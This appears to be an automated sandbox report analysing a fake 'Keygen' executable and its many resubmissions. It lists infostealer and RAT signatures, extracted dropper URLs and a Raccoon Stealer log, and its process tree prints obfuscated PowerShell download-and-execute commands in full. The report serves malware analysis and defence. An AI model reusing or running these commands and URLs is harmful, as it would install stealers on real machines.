Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (32).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:36:09 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (522 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 31 IoCs
  • Loads dropped DLL 61 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry class 7 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (32).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (32).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\3082.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (32).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Users\Admin\AppData\Local\Temp\3082.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1872
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1076
          • C:\Users\Public\zkh.exe
            "C:\Users\Public\zkh.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2920
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:3028
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2124
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2124 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\712365987067906\\* & exit
                  8⤵
                    PID:2016
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2124
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:980
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:3060
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2212
              • C:\Users\Public\zkh.exe
                "C:\Users\Public\zkh.exe"
                6⤵
                • Executes dropped EXE
                PID:1552
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2044
            • C:\Users\Public\zkh.exe
              "C:\Users\Public\zkh.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2400
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:1568
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:2860
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /pid 2860 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\397060367355630\\* & exit
                    8⤵
                      PID:2372
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /pid 2860
                        9⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1400
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2544
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2588
                • C:\Users\Public\zkh.exe
                  "C:\Users\Public\zkh.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2680
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:1892
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\b.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:992
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
